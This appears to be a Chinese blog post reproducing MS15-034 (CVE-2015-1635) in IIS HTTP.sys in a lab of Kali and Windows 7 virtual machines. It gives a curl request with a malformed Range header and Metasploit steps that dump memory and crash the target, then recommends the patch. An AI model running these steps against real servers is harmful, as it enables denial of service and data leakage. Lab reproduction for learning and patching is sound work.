MS15-034远程执行代码漏洞CVE-2015-1635IIS中的HTTP.sys 中的漏洞

1、漏洞说明
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,ms15-034此更新可以修复此漏洞。更多详情https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034

2、漏洞复现
环境准备:
1)在虚拟机中准备两台虚拟机,一台为攻击者,另外一台为受害者。这里攻击者选择的是kali虚拟机,受害者选择的是window7操作系统,注意:这里的是64位的操作系统,32位的操作系统经过我自己测试无法测试成功。并确保两台机子在同一个局域网,window7关闭防火墙。
Wind7靶机ip 192.168.17.197
Kali攻击ip地址 192.168.17.195
2)在window7操作系统上搭建IIS服务,详情参考https://jingyan.baidu.com/article/2fb0ba40916a1c00f2ec5ff7.html
开始复现:
第一步:打开kali,输入命令curl http://192.168.17.197-H “192.168.17.197” -H “Range:bytes=0-18446744073709551615”,向window7http发送数据包当出现Requested Range Not Satisfiable则存在该漏洞,如图:
在这里插入图片描述
第二步:启动msf命令:msfconsole
然后search ms15-034
在这里插入图片描述
使用use auxiliary/scanner/http/ms15_034_http_sys_memory_dump模块,set RHOSTS 192.168.17.197如图
在这里插入图片描述
读取信息内存
在这里插入图片描述
进行攻击
在这里插入图片描述
window7蓝屏重新启动
在这里插入图片描述
在这里插入图片描述

修复意见:打上ms15-034补丁。

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值